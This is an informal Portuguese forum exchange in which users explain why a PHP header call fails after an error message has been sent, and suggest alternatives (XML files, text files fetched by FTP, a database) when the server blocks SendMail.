o script tem um commando header que da instruçoes sobre o fluxo mandado para o navegador
a mensagem de erro previa e o primeiro fluxo mandado por navegador, isso impossibilita qualquer qualquer commando header

rog
realty.sys is corrupt :  reboot the universe (Y/N)

d3rf

Cara o servidor nao liberou para vc ter acesso ao SendMail... vc pode ter algumas opções:

1ª (Recomendada):
   através dos dados vc escreve arquivos XML e faz um código leitor de XML, vc pode ver via web mesmo ou baixar para sua mákina.
2ª (ARQUIVOS)
   Vc pode mandar escrever esses dados num arquivo ini ou txt e pegar por FTP do seu site
3ª (BD)
  Se tiver acesso a BD grave no BD !

Choose your destiny que o código a gente faz junto com vc !
Escolher ae e diga qual vc ker !